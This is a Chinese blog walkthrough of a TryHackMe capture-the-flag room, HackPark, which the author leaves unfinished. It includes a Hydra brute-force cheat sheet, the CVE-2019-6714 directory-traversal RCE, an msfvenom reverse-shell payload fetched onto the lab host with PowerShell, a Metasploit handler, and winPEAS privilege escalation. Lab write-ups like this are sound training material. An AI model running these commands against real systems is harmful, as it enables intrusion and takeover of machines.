前言
房间地址:https://tryhackme.com/room/hackpark
使用 Hydra 暴力破解网站登录,识别并使用公共漏洞,然后升级您在此 Windows 计算机上的权限!
建站不一定需要linux(实际上市场上大部分都是linux,本次要打的靶场是用win建站,我们通过的网站漏洞打进Windows主机
看到是人入侵Windows 使用到了MSF,看经典好像是当年的永恒之蓝漏洞
实战
靶机地址:10.10.201.235
Hackpark的引入
小丑回魂里的,我虽然没看过这个电影,但是刷过片段,还行,这里只是一个小丑,其实我也是小丑
有个联系,预测可能有XSS注入,
这里有个登录,那就是爆破了
我们看下 第一题:
九头蛇爆破账号密码
让后看第二题
Hydra 确实有很多功能,并且有许多可用的“模块”(模块的一个示例是我们上面使用的http-post-form )。
然而,这个工具不仅适用于暴力破解 HTTP 表单,还适用于其他协议,如 FTP、SSH、SMTP、SMB 等。
下面是一个迷你备忘单:
命令 | 描述 |
Hydra -P <单词列表> -v <ip> <协议> | 对您选择的协议进行暴力破解 |
Hydra -v -V -u -L <用户名列表> -P <密码列表> -t 1 -u <ip> <协议> | 您可以使用 Hydra 来暴力破解用户名和密码。它将循环遍历列表中的每个组合。(-vV = 详细模式,显示登录尝试) |
Hydra -t 1 -V -f -l <用户名> -P <单词列表> rdp://<ip> | 使用密码列表攻击 Windows 远程桌面。 |
Hydra -l <用户名> -P .<密码列表> $ip -V http-form-post ‘/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=登录&testcookie=1:S =位置’ | 为 Hydra 提出更具体的暴力请求。 |
我还是用burp吧 。
我前面发了很多爆破账号密码的,这里就不演示了
密码:1qaz2wsx
thm连接老是断 ,等订阅结束就打htb
CVE-2019-6714利用反弹shell
看第三关
可以看到版本
我们搜一下漏洞库
果然是有XSS漏洞 不过是在3.3.8 3.3.6应该也有
CVE-2019-6714 刚开始房间也有提示
当然我们也可以找漏洞库查看
第三个答案让我们使用公共漏洞,获得对服务器的初始访问权限。
searchsploit -m aspx/webapps/46353.cs
咱们给他下到桌面上使用
nano 46353.cs
好让我们按他说的做
上传完看给的脚本下一步让我们怎么做
这里让我们目录遍历执行RCE漏洞
所以目录遍历+Rce命令执行直接弹shell了
http://10.10.201.235/?theme=../../App_Data/files
这里是win建的站 所以命令跟Linux不太一样
本篇重点MSF生成木马+winpeas提权脚本利用
来到第四关
MSF生成shell木马:
msfvenom -p windows/shell_reverse_tcp -a x86 --encoder /x86/shikata_ga_nai LHOST=10.8.249.244 LPORT=1238 -f exe -o reverse.exe
之后开启http服务
python3 -m http.server
加载msf
msfconsole
use exploit/multi/handler #进入攻击模块
之后设置我们生成的ip和端口
show options
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST tun0
set LHOST tun0
set LPORT 1238
让后运行木马
run
因为Windows需要在powershell里运行 众所周知cmd和powershell不一样 所以我们需要转一下目录在靶机里运行我们msf生成的shell
移动到temp
cd Windows
cd Temp
让靶机下载我们的shell
powershell Invoke-WebRequest -Uri http://10.8.249.244:8000/reverse.exe -Outfile reverse.exe
让后运行shell
.\reverse.exe
OK 看图,现在已经得到目标机器的权限了
查看系统版本信息:
sysinfo
好的我们继续
使用国外大佬Winpeas脚本提权
好的 下面介绍一下winpeas,前期我们了解到linpeas是跑linux提权的,顾名思义,那么winpeas就是跑win机器提权的
winpeas下载:
https://github.com/carlospolop/PEASS-ng/blob/master/winPEAS/winPEASbat/winPEAS.bat
传上去
powershell Invoke-WebRequest -Uri http://10.8.249.244:8000/winPEAS.bat -Outfile winPEAS.bat
好的那我们运行他吧
先shell在运行 大宝贝出现了
结果非常长 而且需要耗点时间
让我们先做题吧
给我们提示了
那我们进去一下
SystemScheduler应该是系统文件了
第一个事件应该是错误的地方
我们查看一下txt
石锤了 应该就是message.exe这个程序
我们在看一下winPEAS.bat
看我们发现了什么?(狂喜
远程admin 说明他很有可能开了3389端口 我们去扫一下看看
nmap -T4 -p 3000-4000 -Pn 10.10.201.235
果然开放了3389,我们去连接看一下
nnd,失败卡住了
3389rdp admin账号密码出来了,我们尝试去连接
失败了
Linux rdp连接也失败了 被阻断了
卡在这了。。我c 没做完
时间也到期了,重来一遍要耗点时间..
Windows渗透比linux难,目前Windows渗透我还不怎么会,这次没做完,下次更新继续做,这个房间确实有意思,但难度让我吃不消了
暂无评论内容